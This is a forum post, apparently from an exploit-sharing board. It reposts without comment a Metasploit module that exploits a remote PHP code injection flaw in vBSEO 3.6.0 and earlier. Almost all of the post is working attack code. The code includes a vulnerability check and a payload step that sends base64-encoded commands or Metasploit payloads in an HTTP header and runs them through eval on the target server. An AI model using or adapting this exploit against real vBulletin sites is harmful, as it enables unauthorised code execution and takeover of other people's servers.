Jump to content
dr.d3v1l

vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection Exploit

By dr.d3v1l, in Exploituri

Recommended Posts

dr.d3v1l Newbie

dr.d3v1l

Posted
Posted 
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection',
            'Description'    => %q{
                    This module exploits a vulnerability in the 'proc_deutf()' function
                defined in /includes/functions_vbseocp_abstract.php. User input passed through
                'char_repl' POST parameter isn't properly sanitized before being used in a call
                to preg_replace() function which uses the 'e' modifier. This can be exploited to
                inject and execute arbitrary code leveraging the PHP's complex curly syntax.
            },
            'Author'         => 'EgiX <n0b0d13s[at]gmail.com>', # originally reported by the vendor
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision$',
            'References'     =>
                [
                    ['BID', '51647'],
                    ['URL', 'http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/'],
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Space'       => 8190,
                    'Keys'        => ['php'],
                },
            'Platform'       => ['php'],
            'Arch'           => ARCH_PHP,
            'Targets'        => [[ 'Automatic', { }]],
            'DisclosureDate' => 'Jan 23 2012',
            'DefaultTarget'  => 0))

            register_options(
                [
                    OptString.new('URI', [true, "The full URI path to vBulletin", "/vb/"]),
                ], self.class)
    end

    def check
        flag = rand_text_alpha(rand(10)+10)
        data = "char_repl='{${print(#{flag})}}'=>"

        uri = ''
        uri << datastore['URI']
        uri << '/' if uri[-1,1] != '/'
        uri << 'vbseocp.php'

        response = send_request_cgi({
            'method' => "POST",
            'uri' => uri,
            'data' => "#{data}"
        })

        if response.code == 200 and response.body =~ /#{flag}/
            return Exploit::CheckCode::Vulnerable
        end

        return Exploit::CheckCode::Safe
    end

    def exploit
        if datastore['CMD']
            p = "passthru(\"%s\");" % datastore['CMD']
            p = Rex::Text.encode_base64(p)
        else
            p = Rex::Text.encode_base64(payload.encoded)
        end

        data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"

        uri = ''
        uri << datastore['URI']
        uri << '/' if uri[-1,1] != '/'
        uri << 'vbseocp.php'

        response = send_request_cgi({
            'method' => 'POST',
            'uri' => uri,
            'data' => data,
            'headers' => { 'Code' => p }
        })

        print_status("%s" % response.body) if datastore['CMD']
    end

end

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...